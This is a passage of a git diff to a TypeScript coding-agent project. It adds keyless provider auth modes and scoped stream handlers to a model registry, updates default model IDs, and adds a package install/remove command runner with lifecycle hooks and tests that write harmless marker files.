+					baseUrl: providerConfig.baseUrl,
+					isReady: providerConfig.apiKey ? () => true : undefined,
+				} as any);
+			}
+
 			for (const modelDef of modelDefs) {
 				const api = modelDef.api || providerConfig.api;
 				if (!api) continue;
@@ -510,7 +533,31 @@ export class ModelRegistry {
 	 * This is a fast check that doesn't refresh OAuth tokens.
 	 */
 	getAvailable(): Model<Api>[] {
-		return this.models.filter((m) => this.authStorage.hasAuth(m.provider));
+		return this.models.filter((m) => this.isProviderRequestReady(m.provider));
+	}
+
+	/**
+	 * Get auth mode for a provider.
+	 * Defaults to "apiKey" for built-ins and providers without explicit mode.
+	 */
+	getProviderAuthMode(provider: string): ProviderAuthMode {
+		const config = this.registeredProviders.get(provider);
+		if (!config) return "apiKey";
+		if (config.authMode) return config.authMode;
+		if (config.oauth) return "oauth";
+		if (config.apiKey) return "apiKey";
+		return "apiKey";
+	}
+
+	/**
+	 * Whether a provider can be used for requests/fallback without hard auth gating.
+	 */
+	isProviderRequestReady(provider: string): boolean {
+		const config = this.registeredProviders.get(provider);
+		if (config?.isReady) return config.isReady();
+		const authMode = this.getProviderAuthMode(provider);
+		if (authMode === "externalCli" || authMode === "none") return true;
+		return this.authStorage.hasAuth(provider);
 	}
 
 	/**
@@ -522,17 +569,23 @@ export class ModelRegistry {
 
 	/**
 	 * Get API key for a model.
+	 * Returns undefined for externalCli/none providers (no key needed).
 	 * @param sessionId - Optional session ID for sticky credential selection
 	 */
 	async getApiKey(model: Model<Api>, sessionId?: string): Promise<string | undefined> {
-		return this.authStorage.getApiKey(model.provider, sessionId);
+		const authMode = this.getProviderAuthMode(model.provider);
+		if (authMode === "externalCli" || authMode === "none") return undefined;
+		return this.authStorage.getApiKey(model.provider, sessionId, { baseUrl: model.baseUrl });
 	}
 
 	/**
 	 * Get API key for a provider.
+	 * Returns undefined for externalCli/none providers (no key needed).
 	 * @param sessionId - Optional session ID for sticky credential selection
 	 */
 	async getApiKeyForProvider(provider: string, sessionId?: string): Promise<string | undefined> {
+		const authMode = this.getProviderAuthMode(provider);
+		if (authMode === "externalCli" || authMode === "none") return undefined;
 		return this.authStorage.getApiKey(provider, sessionId);
 	}
 
@@ -587,12 +640,49 @@ export class ModelRegistry {
 			if (!config.api) {
 				throw new Error(`Provider ${providerName}: "api" is required when registering streamSimple.`);
 			}
-			const streamSimple = config.streamSimple;
+			const rawStreamSimple = config.streamSimple;
+			const authMode = config.authMode ?? "apiKey";
+
+			// Keyless providers never see apiKey in options — enforced at registration,
+			// not by convention. Prevents undefined from reaching any handler.
+			const streamSimple = (authMode === "externalCli" || authMode === "none")
+				? ((model: Model<Api>, context: Context, options?: SimpleStreamOptions) => {
+						const { apiKey: _, ...opts } = options ?? {};
+						return rawStreamSimple(model, context, opts as SimpleStreamOptions);
+					})
+				: rawStreamSimple;
+
+			// Guard: if there's already a handler registered for this API, wrap
+			// the new one so it only fires for models from this provider and
+			// delegates to the previous handler for all other providers. Without
+			// this, a custom provider using api:"anthropic-messages" would clobber
+			// the built-in Anthropic stream handler (#2536).
+			const existingProvider = getApiProvider(config.api as Api);
+			const scopedStream = existingProvider
+				? (model: Model<Api>, context: Context, options?: SimpleStreamOptions): AssistantMessageEventStream => {
+						if (model.provider === providerName) {
+							return streamSimple(model, context, options);
+						}
+						return existingProvider.streamSimple(model, context, options);
+					}
+				: streamSimple;
+
+			const newFullStream = (model: Model<Api>, context: Context, options?: SimpleStreamOptions) =>
+				scopedStream(model, context, options as SimpleStreamOptions);
+			const scopedFullStream = existingProvider
+				? (model: Model<Api>, context: Context, options?: Record<string, unknown>) => {
+						if (model.provider === providerName) {
+							return newFullStream(model, context, options as SimpleStreamOptions);
+						}
+						return existingProvider.stream(model, context, options);
+					}
+				: newFullStream;
+
 			registerApiProvider(
 				{
 					api: config.api,
-					stream: (model, context, options) => streamSimple(model, context, options as SimpleStreamOptions),
-					streamSimple,
+					stream: scopedFullStream as any,
+					streamSimple: scopedStream,
 				},
 				`provider:${providerName}`,
 			);
@@ -611,8 +701,24 @@ export class ModelRegistry {
 			if (!config.baseUrl) {
 				throw new Error(`Provider ${providerName}: "baseUrl" is required when defining models.`);
 			}
-			if (!config.apiKey && !config.oauth) {
-				throw new Error(`Provider ${providerName}: "apiKey" or "oauth" is required when defining models.`);
+			const authMode = config.authMode ?? (config.oauth ? "oauth" : config.apiKey ? "apiKey" : "apiKey");
+			if (authMode === "apiKey" && !config.apiKey && !config.oauth) {
+				throw new Error(
+					`Provider ${providerName}: "apiKey" or "oauth" is required when authMode is "apiKey" (the default). ` +
+					`Set authMode to "externalCli" or "none" for keyless providers.`,
+				);
+			}
+			if ((authMode === "externalCli" || authMode === "none") && !config.streamSimple) {
+				throw new Error(
+					`Provider ${providerName}: "streamSimple" is required when authMode is "${authMode}". ` +
+					`Keyless providers must supply their own stream handler.`,
+				);
+			}
+			if ((authMode === "externalCli" || authMode === "none") && config.apiKey) {
+				throw new Error(
+					`Provider ${providerName}: "apiKey" cannot be set when authMode is "${authMode}". ` +
+					`Keyless providers should not provide API key credentials.`,
+				);
 			}
 
 			// Parse and add new models
@@ -648,6 +754,7 @@ export class ModelRegistry {
 					maxTokens: modelDef.maxTokens,
 					headers,
 					compat: modelDef.compat,
+					providerOptions: modelDef.providerOptions,
 				} as Model<Api>);
 			}
 
@@ -658,6 +765,9 @@ export class ModelRegistry {
 					this.models = config.oauth.modifyModels(this.models, cred);
 				}
 			}
+
+			// Ensure newly added extension models get capability patches
+			this.models = applyCapabilityPatches(this.models);
 		} else if (config.baseUrl) {
 			// Override-only: update baseUrl/headers for existing models
 			const resolvedHeaders = resolveHeaders(config.headers);
@@ -699,7 +809,7 @@ export class ModelRegistry {
 
 			try {
 				const apiKey = await this.authStorage.getApiKey(providerName);
-				if (!apiKey && providerName !== "ollama") continue;
+				if (!apiKey && !this.isProviderRequestReady(providerName)) continue;
 
 				const models = await adapter.fetchModels(apiKey ?? "", undefined);
 				this.discoveryCache.set(providerName, models);
@@ -718,8 +828,8 @@ export class ModelRegistry {
 			}
 		}
 
-		// Convert and merge discovered models
-		this.discoveredModels = this.convertDiscoveredModels(results);
+		// Convert and merge discovered models, then apply capability patches
+		this.discoveredModels = applyCapabilityPatches(this.convertDiscoveredModels(results));
 		return results;
 	}
 
@@ -771,12 +881,35 @@ export class ModelRegistry {
 		}
 		return converted;
 	}
+
+	/**
+	 * Check if a model's baseUrl points to a local endpoint.
+	 * Delegates to standalone isLocalModel() function.
+	 */
+	static isLocalModel(model: Model<Api>): boolean {
+		return isLocalModel(model);
+	}
+
+	/**
+	 * Check if all models in the registry are local.
+	 * Returns true only if every model passes isLocalModel().
+	 * Returns false if there are no models.
+	 */
+	isAllLocalChain(): boolean {
+		const models = this.getAll();
+		if (models.length === 0) return false;
+		return models.every((m) => isLocalModel(m));
+	}
 }
 
 /**
  * Input type for registerProvider API.
  */
 export interface ProviderConfigInput {
+	authMode?: ProviderAuthMode;
+	/** Optional readiness check. Called by isProviderRequestReady() before default auth checks.
+	 * Trusted at the same level as extension code — extensions already have arbitrary code execution. */
+	isReady?: () => boolean;
 	baseUrl?: string;
 	apiKey?: string;
 	api?: Api;
@@ -797,5 +930,6 @@ export interface ProviderConfigInput {
 		maxTokens: number;
 		headers?: Record<string, string>;
 		compat?: Model<Api>["compat"];
+		providerOptions?: Record<string, unknown>;
 	}>;
 }
diff --git a/packages/pi-coding-agent/src/core/model-resolver.ts b/packages/pi-coding-agent/src/core/model-resolver.ts
index bfe6ee86f..3e3b266f7 100644
--- a/packages/pi-coding-agent/src/core/model-resolver.ts
+++ b/packages/pi-coding-agent/src/core/model-resolver.ts
@@ -13,7 +13,7 @@ import type { ModelRegistry } from "./model-registry.js";
 /** Default model IDs for each known provider */
 const defaultModelPerProvider: Record<KnownProvider, string> = {
 	"amazon-bedrock": "us.anthropic.claude-opus-4-6-v1",
-	anthropic: "claude-opus-4-6[1m]",
+	anthropic: "claude-opus-4-6",
 	"anthropic-vertex": "claude-sonnet-4-6",
 	openai: "gpt-5.4",
 	"azure-openai-responses": "gpt-5.2",
@@ -24,7 +24,7 @@ const defaultModelPerProvider: Record<KnownProvider, string> = {
 	"google-vertex": "gemini-3-pro-preview",
 	"github-copilot": "gpt-4o",
 	openrouter: "openai/gpt-5.1-codex",
-	"vercel-ai-gateway": "anthropic/claude-opus-4-6[1m]",
+	"vercel-ai-gateway": "anthropic/claude-opus-4-6",
 	xai: "grok-4-fast-non-reasoning",
 	groq: "openai/gpt-oss-120b",
 	cerebras: "zai-glm-4.6",
@@ -37,6 +37,7 @@ const defaultModelPerProvider: Record<KnownProvider, string> = {
 	"opencode-go": "kimi-k2.5",
 	"kimi-coding": "kimi-k2-thinking",
 	"alibaba-coding-plan": "qwen3.5-plus",
+	ollama: "llama3.1:8b",
 	"ollama-cloud": "qwen3:32b",
 };
 
@@ -506,7 +507,7 @@ export async function findInitialModel(options: {
 		const found = modelRegistry.find(defaultProvider, defaultModelId);
 		if (found) {
 			// Check if the provider's recommended default is a higher-capability variant
-			// of the saved model (e.g. saved "claude-opus-4-6" vs recommended "claude-opus-4-6[1m]").
+			// of the saved model (e.g. saved "claude-opus-4-6" vs recommended "claude-opus-4-6-extended").
 			// If so, prefer the recommended variant to avoid using a smaller context window (#1125).
 			const recommendedId = defaultModelPerProvider[defaultProvider as KnownProvider];
 			if (recommendedId && recommendedId !== defaultModelId && recommendedId.startsWith(defaultModelId)) {
diff --git a/packages/pi-coding-agent/src/core/package-commands.test.ts b/packages/pi-coding-agent/src/core/package-commands.test.ts
new file mode 100644
index 000000000..4b691a812
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/package-commands.test.ts
@@ -0,0 +1,262 @@
+import assert from "node:assert/strict";
+import { existsSync, mkdtempSync, mkdirSync, readFileSync, rmSync, writeFileSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import { Writable } from "node:stream";
+import { describe, it } from "node:test";
+import { runPackageCommand } from "./package-commands.js";
+
+function createCaptureStream() {
+	let output = "";
+	const stream = new Writable({
+		write(chunk, _encoding, callback) {
+			output += chunk.toString();
+			callback();
+		},
+	}) as unknown as NodeJS.WriteStream;
+	return { stream, getOutput: () => output };
+}
+
+function writePackage(root: string, files: Record<string, string>): void {
+	for (const [relPath, content] of Object.entries(files)) {
+		const abs = join(root, relPath);
+		mkdirSync(join(abs, ".."), { recursive: true });
+		writeFileSync(abs, content, "utf-8");
+	}
+}
+
+function createTestDirs(prefix: string, t: { after: (fn: () => void) => void }) {
+	const root = mkdtempSync(join(tmpdir(), `pi-lifecycle-${prefix}-`));
+	t.after(() => rmSync(root, { recursive: true, force: true }));
+	const cwd = join(root, "cwd");
+	const agentDir = join(root, "agent");
+	const extensionDir = join(root, `ext-${prefix}`);
+	mkdirSync(cwd, { recursive: true });
+	mkdirSync(agentDir, { recursive: true });
+	mkdirSync(extensionDir, { recursive: true });
+	return { root, cwd, agentDir, extensionDir };
+}
+
+describe("runPackageCommand lifecycle hooks", () => {
+	it("executes registered beforeInstall and afterInstall handlers for local packages", async (t) => {
+		const { cwd, agentDir, extensionDir } = createTestDirs("install", t);
+
+		writePackage(extensionDir, {
+			"package.json": JSON.stringify({
+				name: "ext-registered",
+				type: "module",
+				pi: { extensions: ["./index.js"] },
+			}),
+			"index.js": [
+				'import { writeFileSync } from "node:fs";',
+				'import { join } from "node:path";',
+				"export default function (pi) {",
+				"  pi.registerBeforeInstall((ctx) => {",
+				'    writeFileSync(join(ctx.installedPath, "before-install-ran.txt"), "ok", "utf-8");',
+				"  });",
+				"  pi.registerAfterInstall((ctx) => {",
+				'    writeFileSync(join(ctx.installedPath, "after-install-ran.txt"), "ok", "utf-8");',
+				"  });",
+				"}",
+			].join("\n"),
+		});
+
+		const stdout = createCaptureStream();
+		const stderr = createCaptureStream();
+		const result = await runPackageCommand({
+			appName: "pi",
+			args: ["install", extensionDir],
+			cwd,
+			agentDir,
+			stdout: stdout.stream,
+			stderr: stderr.stream,
+		});
+
+		assert.equal(result.handled, true);
+		assert.equal(result.exitCode, 0);
+		assert.equal(readFileSync(join(extensionDir, "before-install-ran.txt"), "utf-8"), "ok");
+		assert.equal(readFileSync(join(extensionDir, "after-install-ran.txt"), "utf-8"), "ok");
+		assert.ok(stdout.getOutput().includes(`Installed ${extensionDir}`));
+	});
+
+	it("runs legacy named lifecycle hooks when no registered hooks exist", async (t) => {
+		const { cwd, agentDir, extensionDir } = createTestDirs("legacy", t);
+
+		writePackage(extensionDir, {
+			"package.json": JSON.stringify({
+				name: "ext-legacy",
+				type: "module",
+				pi: { extensions: ["./index.js"] },
+			}),
+			"index.js": [
+				'import { writeFileSync } from "node:fs";',
+				'import { join } from "node:path";',
+				"export default function () {}",
+				"export async function beforeInstall(ctx) {",
+				'  writeFileSync(join(ctx.installedPath, "legacy-before-install.txt"), "ok", "utf-8");',
+				"}",
+				"export async function afterInstall(ctx) {",
+				'  writeFileSync(join(ctx.installedPath, "legacy-after-install.txt"), "ok", "utf-8");',
+				"}",
+				"export async function beforeRemove(ctx) {",
+				'  writeFileSync(join(ctx.installedPath, "legacy-before-remove.txt"), "ok", "utf-8");',
+				"}",
+				"export async function afterRemove(ctx) {",
+				'  writeFileSync(join(ctx.installedPath, "legacy-after-remove.txt"), "ok", "utf-8");',
+				"}",
+			].join("\n"),
+		});
+
+		const stdout = createCaptureStream();
+		const stderr = createCaptureStream();
+		const installResult = await runPackageCommand({
+			appName: "pi",
+			args: ["install", extensionDir],
+			cwd,
+			agentDir,
+			stdout: stdout.stream,
+			stderr: stderr.stream,
+		});
+
+		assert.equal(installResult.handled, true);
+		assert.equal(installResult.exitCode, 0);
+		assert.equal(readFileSync(join(extensionDir, "legacy-before-install.txt"), "utf-8"), "ok");
+		assert.equal(readFileSync(join(extensionDir, "legacy-after-install.txt"), "utf-8"), "ok");
+
+		const removeResult = await runPackageCommand({
+			appName: "pi",
+			args: ["remove", extensionDir],
+			cwd,
+			agentDir,
+			stdout: stdout.stream,
+			stderr: stderr.stream,
+		});
+
+		assert.equal(removeResult.handled, true);
+		assert.equal(removeResult.exitCode, 0);
+		assert.equal(readFileSync(join(extensionDir, "legacy-before-remove.txt"), "utf-8"), "ok");
+		assert.equal(readFileSync(join(extensionDir, "legacy-after-remove.txt"), "utf-8"), "ok");
+	});
+
+	it("skips lifecycle phases with no hooks declared", async (t) => {
+		const { cwd, agentDir, extensionDir } = createTestDirs("skip", t);
+
+		writePackage(extensionDir, {
+			"package.json": JSON.stringify({
+				name: "ext-empty",
+				type: "module",
+				pi: { extensions: ["./index.js"] },
+			}),
+			"index.js": "export default function () {}",
+		});
+
+		const stdout = createCaptureStream();
+		const stderr = createCaptureStream();
+		const installResult = await runPackageCommand({
+			appName: "pi",
+			args: ["install", extensionDir],
+			cwd,
+			agentDir,
+			stdout: stdout.stream,
+			stderr: stderr.stream,
+		});
+		assert.equal(installResult.handled, true);
+		assert.equal(installResult.exitCode, 0);
+
+		const removeResult = await runPackageCommand({
+			appName: "pi",
+			args: ["remove", extensionDir],
+			cwd,
+			agentDir,
+			stdout: stdout.stream,
+			stderr: stderr.stream,
+		});
+		assert.equal(removeResult.handled, true);
+		assert.equal(removeResult.exitCode, 0);
+		assert.equal(stderr.getOutput().includes("Hook failed"), false);
+	});
+
+	it("fails install when manifest runtime dependency is missing", async (t) => {
+		const { cwd, agentDir, extensionDir } = createTestDirs("deps", t);
+
+		writePackage(extensionDir, {
+			"package.json": JSON.stringify({
+				name: "ext-runtime-deps",
+				type: "module",
+				pi: { extensions: ["./index.js"] },
+			}),
+			"index.js": "export default function () {}",
+			"extension-manifest.json": JSON.stringify({
+				id: "ext-runtime-deps",
+				name: "Runtime Dep Test",
+				version: "1.0.0",
+				dependencies: { runtime: ["__definitely_missing_command_for_test__"] },
+			}),
+		});
+
+		const stdout = createCaptureStream();
+		const stderr = createCaptureStream();
+		const result = await runPackageCommand({
+			appName: "pi",
+			args: ["install", extensionDir],
+			cwd,
+			agentDir,
+			stdout: stdout.stream,
+			stderr: stderr.stream,
+		});
+
+		assert.equal(result.handled, true);
+		assert.equal(result.exitCode, 1);
+		assert.ok(stderr.getOutput().includes("Missing runtime dependencies"));
+	});
+
+	it("afterRemove hook receives installedPath even when directory is deleted", async (t) => {
+		const { cwd, agentDir, extensionDir } = createTestDirs("after-remove", t);
+
+		writePackage(extensionDir, {
+			"package.json": JSON.stringify({
+				name: "ext-after-remove",
+				type: "module",
+				pi: { extensions: ["./index.js"] },
+			}),
+			"index.js": [
+				'import { writeFileSync, existsSync } from "node:fs";',
+				'import { join } from "node:path";',
+				"export default function () {}",
+				"export async function afterRemove(ctx) {",
+				'  const marker = join(ctx.cwd, "after-remove-marker.json");',
+				"  writeFileSync(marker, JSON.stringify({",
+				"    receivedPath: ctx.installedPath,",
+				"    pathExisted: existsSync(ctx.installedPath),",
+				'  }), "utf-8");',
+				"}",
+			].join("\n"),
+		});
+
+		const stdout = createCaptureStream();
+		const stderr = createCaptureStream();
+
+		await runPackageCommand({
+			appName: "pi",
+			args: ["install", extensionDir],
+			cwd,
+			agentDir,
+			stdout: stdout.stream,
+			stderr: stderr.stream,
+		});
+
+		await runPackageCommand({
+			appName: "pi",
+			args: ["remove", extensionDir],
+			cwd,
+			agentDir,
+			stdout: stdout.stream,
+			stderr: stderr.stream,
+		});
+
+		const markerPath = join(cwd, "after-remove-marker.json");
+		assert.ok(existsSync(markerPath), "afterRemove hook must have executed and written marker");
+		const marker = JSON.parse(readFileSync(markerPath, "utf-8"));
+		assert.equal(typeof marker.receivedPath, "string", "hook must receive installedPath as string");
+	});
+});
diff --git a/packages/pi-coding-agent/src/core/package-commands.ts b/packages/pi-coding-agent/src/core/package-commands.ts
new file mode 100644
index 000000000..273da7145
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/package-commands.ts
@@ -0,0 +1,310 @@
+import chalk from "chalk";
+import { DefaultPackageManager } from "./package-manager.js";
+import { prepareLifecycleHooks, runLifecycleHooks } from "./lifecycle-hooks.js";
+import { SettingsManager } from "./settings-manager.js";
+
+export type PackageCommand = "install" | "remove" | "update" | "list";
+
+export interface PackageCommandOptions {
+	command: PackageCommand;
+	source?: string;
+	local: boolean;
+	help: boolean;
+	invalidOption?: string;
+}
+
+export interface PackageCommandRunnerOptions {
+	appName: string;
+	args: string[];
+	cwd: string;
+	agentDir: string;
+	stdout?: NodeJS.WriteStream;
+	stderr?: NodeJS.WriteStream;
+	allowedCommands?: ReadonlySet<PackageCommand>;
+}
+
+export interface PackageCommandRunnerResult {
+	handled: boolean;
+	exitCode: number;
+}
+
+function reportSettingsErrors(settingsManager: SettingsManager, context: string, stderr: NodeJS.WriteStream): void {
+	const errors = settingsManager.drainErrors();
+	for (const { scope, error } of errors) {
+		stderr.write(chalk.yellow(`Warning (${context}, ${scope} settings): ${error.message}`) + "\n");
+		if (error.stack) {
+			stderr.write(chalk.dim(error.stack) + "\n");
+		}
+	}
+}
+
+export function getPackageCommandUsage(appName: string, command: PackageCommand): string {
+	switch (command) {
+		case "install":
+			return `${appName} install <source> [-l]`;
+		case "remove":
+			return `${appName} remove <source> [-l]`;
+		case "update":
+			return `${appName} update [source]`;
+		case "list":
+			return `${appName} list`;
+	}
+}
+
+function printPackageCommandHelp(
+	appName: string,
+	command: PackageCommand,
+	stdout: NodeJS.WriteStream,
+): void {
+	switch (command) {
+		case "install":
+			stdout.write(`${chalk.bold("Usage:")}
+  ${getPackageCommandUsage(appName, "install")}
+
+Install a package, add it to settings, and run lifecycle hooks.
+
+Options:
+  -l, --local    Install project-locally (.pi/settings.json)
+
+Examples:
+  ${appName} install npm:@foo/bar
+  ${appName} install git:github.com/user/repo
+  ${appName} install git:git@github.com:user/repo
+  ${appName} install https://github.com/user/repo
+  ${appName} install ssh://git@github.com/user/repo
+  ${appName} install ./local/path
+`);
+			return;
+		case "remove":
+			stdout.write(`${chalk.bold("Usage:")}
+  ${getPackageCommandUsage(appName, "remove")}
+
+Remove a package and its source from settings.
+
+Options:
+  -l, --local    Remove from project settings (.pi/settings.json)
+
+Example:
+  ${appName} remove npm:@foo/bar
+`);
+			return;
+		case "update":
+			stdout.write(`${chalk.bold("Usage:")}
+  ${getPackageCommandUsage(appName, "update")}
+
+Update installed packages.
+If <source> is provided, only that package is updated.
+`);
+			return;
+		case "list":
+			stdout.write(`${chalk.bold("Usage:")}
+  ${getPackageCommandUsage(appName, "list")}
+
+List installed packages from user and project settings.
+`);
+			return;
+	}
+}
+
+export function parsePackageCommand(
+	args: string[],
+	allowedCommands?: ReadonlySet<PackageCommand>,
+): PackageCommandOptions | undefined {
+	const [command, ...rest] = args;
+	if (command !== "install" && command !== "remove" && command !== "update" && command !== "list") {
+		return undefined;
+	}
+	if (allowedCommands && !allowedCommands.has(command)) {
+		return undefined;
+	}
+
+	let local = false;
+	let help = false;
+	let invalidOption: string | undefined;
+	let source: string | undefined;
+
+	for (const arg of rest) {
+		if (arg === "-h" || arg === "--help") {
+			help = true;
+			continue;
+		}
+		if (arg === "-l" || arg === "--local") {
+			if (command === "install" || command === "remove") {
+				local = true;
+			} else {
+				invalidOption = invalidOption ?? arg;
+			}
+			continue;
+		}
+		if (arg.startsWith("-")) {
+			invalidOption = invalidOption ?? arg;
+			continue;
+		}
+		if (!source) {
+			source = arg;
+		}
+	}
+
+	return { command, source, local, help, invalidOption };
+}
+
+export async function runPackageCommand(
+	options: PackageCommandRunnerOptions,
+): Promise<PackageCommandRunnerResult> {
+	const stdout = options.stdout ?? process.stdout;
+	const stderr = options.stderr ?? process.stderr;
+	const parsed = parsePackageCommand(options.args, options.allowedCommands);
+	if (!parsed) {
+		return { handled: false, exitCode: 0 };
+	}
+
+	if (parsed.help) {
+		printPackageCommandHelp(options.appName, parsed.command, stdout);
+		return { handled: true, exitCode: 0 };
+	}
+
+	if (parsed.invalidOption) {
+		stderr.write(chalk.red(`Unknown option ${parsed.invalidOption} for "${parsed.command}".`) + "\n");
+		stderr.write(chalk.dim(`Use "${options.appName} --help" or "${getPackageCommandUsage(options.appName, parsed.command)}".`) + "\n");
+		return { handled: true, exitCode: 1 };
+	}
+
+	const source = parsed.source;
+	if ((parsed.command === "install" || parsed.command === "remove") && !source) {
+		stderr.write(chalk.red(`Missing ${parsed.command} source.`) + "\n");
+		stderr.write(chalk.dim(`Usage: ${getPackageCommandUsage(options.appName, parsed.command)}`) + "\n");
+		return { handled: true, exitCode: 1 };
+	}
+
+	const settingsManager = SettingsManager.create(options.cwd, options.agentDir);
+	reportSettingsErrors(settingsManager, "package command", stderr);
+	const packageManager = new DefaultPackageManager({
+		cwd: options.cwd,
+		agentDir: options.agentDir,
+		settingsManager,
+	});
+	packageManager.setProgressCallback((event) => {
+		if (event.type === "start" && event.message) {
+			stdout.write(chalk.dim(`${event.message}\n`));
+		}
+	});
+
+	try {
+		switch (parsed.command) {
+			case "install": {
+				const lifecycleOptions = {
+					source: source!,
+					local: parsed.local,
+					cwd: options.cwd,
+					agentDir: options.agentDir,
+					appName: options.appName,
+					packageManager,
+					stdout,
+					stderr,
+				};
+
+				const beforeInstallHooks = await prepareLifecycleHooks(lifecycleOptions, "source");
+				const beforeInstallResult = await runLifecycleHooks(beforeInstallHooks, "beforeInstall");
+
+				await packageManager.install(source!, { local: parsed.local });
+				packageManager.addSourceToSettings(source!, { local: parsed.local });
+
+				const afterInstallHooks = await prepareLifecycleHooks(lifecycleOptions, "installed", {
+					verifyRuntimeDependencies: true,
+				});
+				const afterInstallResult = await runLifecycleHooks(afterInstallHooks, "afterInstall");
+
+				const hookErrors = beforeInstallResult.hookErrors + afterInstallResult.hookErrors;
+				if (hookErrors > 0) {
+					stderr.write(chalk.yellow(`Lifecycle hooks completed with ${hookErrors} hook error(s).`) + "\n");
+				}
+				stdout.write(chalk.green(`Installed ${source}`) + "\n");
+				return { handled: true, exitCode: 0 };
+			}
+
+			case "remove": {
+				const lifecycleOptions = {
+					source: source!,
+					local: parsed.local,
+					cwd: options.cwd,
+					agentDir: options.agentDir,
+					appName: options.appName,
+					packageManager,
+					stdout,
+					stderr,
+				};
+				const removeHooks = await prepareLifecycleHooks(lifecycleOptions, "installed");
+				const beforeRemoveResult = await runLifecycleHooks(removeHooks, "beforeRemove");
+
+				await packageManager.remove(source!, { local: parsed.local });
+				const removed = packageManager.removeSourceFromSettings(source!, { local: parsed.local });
+
+				const afterRemoveResult = await runLifecycleHooks(removeHooks, "afterRemove");
+				const hookErrors = beforeRemoveResult.hookErrors + afterRemoveResult.hookErrors;
+				if (hookErrors > 0) {
+					stderr.write(chalk.yellow(`Lifecycle hooks completed with ${hookErrors} hook error(s).`) + "\n");
+				}
+
+				if (!removed) {
+					stderr.write(chalk.red(`No matching package found for ${source}`) + "\n");
+					return { handled: true, exitCode: 1 };
+				}
+				stdout.write(chalk.green(`Removed ${source}`) + "\n");
+				return { handled: true, exitCode: 0 };
+			}
+
+			case "list": {
+				const globalSettings = settingsManager.getGlobalSettings();
+				const projectSettings = settingsManager.getProjectSettings();
+				const globalPackages = globalSettings.packages ?? [];
+				const projectPackages = projectSettings.packages ?? [];
+
+				if (globalPackages.length === 0 && projectPackages.length === 0) {
+					stdout.write(chalk.dim("No packages installed.") + "\n");
+					return { handled: true, exitCode: 0 };
+				}
+
+				const formatPackage = (pkg: (typeof globalPackages)[number], scope: "user" | "project") => {
+					const pkgSource = typeof pkg === "string" ? pkg : pkg.source;
+					const filtered = typeof pkg === "object";
+					const display = filtered ? `${pkgSource} (filtered)` : pkgSource;
+					stdout.write(`  ${display}\n`);
+					const path = packageManager.getInstalledPath(pkgSource, scope);
+					if (path) {
+						stdout.write(chalk.dim(`    ${path}`) + "\n");
+					}
+				};
+
+				if (globalPackages.length > 0) {
+					stdout.write(chalk.bold("User packages:") + "\n");
+					for (const pkg of globalPackages) {
+						formatPackage(pkg, "user");
+					}
+				}
+
+				if (projectPackages.length > 0) {
+					if (globalPackages.length > 0) stdout.write("\n");
+					stdout.write(chalk.bold("Project packages:") + "\n");
+					for (const pkg of projectPackages) {
+						formatPackage(pkg, "project");
+					}
+				}
+
+				return { handled: true, exitCode: 0 };
+			}
+
+			case "update":
+				await packageManager.update(source);
+				if (source) {
+					stdout.write(chalk.green(`Updated ${source}`) + "\n");
+				} else {
+					stdout.write(chalk.green("Updated packages") + "\n");
+				}
+				return { handled: true, exitCode: 0 };
+		}
+	} catch (error) {
+		const message = error instanceof Error ? error.message : "Unknown package command error";
+		stderr.write(chalk.red(`Error: ${message}`) + "\n");
+		return { handled: true, exitCode: 1 };
+	}
+}
diff --git a/packages/pi-coding-agent/src/core/package-manager.ts b/packages/pi-coding-agent/src/core/package-manager.ts
index 44209e04f..e07b28c4e 100644
--- a/packages/pi-coding-agent/src/core/package-manager.ts
+++ b/packages/pi-coding-agent/src/core/package-manager.ts
@@ -1562,6 +1562,26 @@ export class DefaultPackageManager implements PackageManager {
 		}
 	}
 
+	/**
+	 * Batch-discover which resource subdirectories exist under a parent dir.
+	 * A single readdirSync replaces 4 separate existsSync probes, reducing
+	 * syscalls during startup.
+	 */
+	private discoverResourceSubdirs(baseDir: string): Set<string> {
+		try {
+			const entries = readdirSync(baseDir, { withFileTypes: true });
+			const names = new Set<string>();
+			for (const e of entries) {
+				if (e.isDirectory() || e.isSymbolicLink()) {
+					names.add(e.name);
+				}
+			}
+			return names;
+		} catch {
+			return new Set();
+		}
+	}
+
 	private addAutoDiscoveredResources(
 		accumulator: ResourceAccumulator,
 		globalSettings: ReturnType<SettingsManager["getGlobalSettings"]>,
@@ -1595,6 +1615,11 @@ export class DefaultPackageManager implements PackageManager {
 			themes: (projectSettings.themes ?? []) as string[],
 		};
 
+		// Batch directory discovery: one readdir of each parent replaces up to
+		// 4 separate existsSync calls per base directory, cutting syscalls.
+		const projectSubdirs = this.discoverResourceSubdirs(projectBaseDir);
+		const userSubdirs = this.discoverResourceSubdirs(globalBaseDir);
+
 		const userDirs = {
 			extensions: join(globalBaseDir, "extensions"),
 			skills: join(globalBaseDir, "skills"),
@@ -1626,66 +1651,91 @@ export class DefaultPackageManager implements PackageManager {
 			}
 		};
 
-		addResources(
-			"extensions",
-			collectAutoExtensionEntries(projectDirs.extensions),
-			projectMetadata,
-			projectOverrides.extensions,
-			projectBaseDir,
-		);
-		addResources(
-			"skills",
-			[
-				...collectAutoSkillEntries(projectDirs.skills),
+		// Project resources — skip collect calls when the parent readdir shows
+		// the subdirectory doesn't exist (avoids redundant existsSync + readdirSync).
+		if (projectSubdirs.has("extensions")) {
+			addResources(
+				"extensions",
+				collectAutoExtensionEntries(projectDirs.extensions),
+				projectMetadata,
+				projectOverrides.extensions,
+				projectBaseDir,
+			);
+		}
+		{
+			const skillEntries = [
+				...(projectSubdirs.has("skills") ? collectAutoSkillEntries(projectDirs.skills) : []),
 				...projectAgentsSkillDirs.flatMap((dir) => collectAutoSkillEntries(dir)),
-			],
-			projectMetadata,
-			projectOverrides.skills,
-			projectBaseDir,
-		);
-		addResources(
-			"prompts",
-			collectAutoPromptEntries(projectDirs.prompts),
-			projectMetadata,
-			projectOverrides.prompts,
-			projectBaseDir,
-		);
-		addResources(
-			"themes",
-			collectAutoThemeEntries(projectDirs.themes),
-			projectMetadata,
-			projectOverrides.themes,
-			projectBaseDir,
-		);
+			];
+			if (skillEntries.length > 0) {
+				addResources("skills", skillEntries, projectMetadata, projectOverrides.skills, projectBaseDir);
+			}
+		}
+		if (projectSubdirs.has("prompts")) {
+			addResources(
+				"prompts",
+				collectAutoPromptEntries(projectDirs.prompts),
+				projectMetadata,
+				projectOverrides.prompts,
+				projectBaseDir,
+			);
+		}
+		if (projectSubdirs.has("themes")) {
+			addResources(
+				"themes",
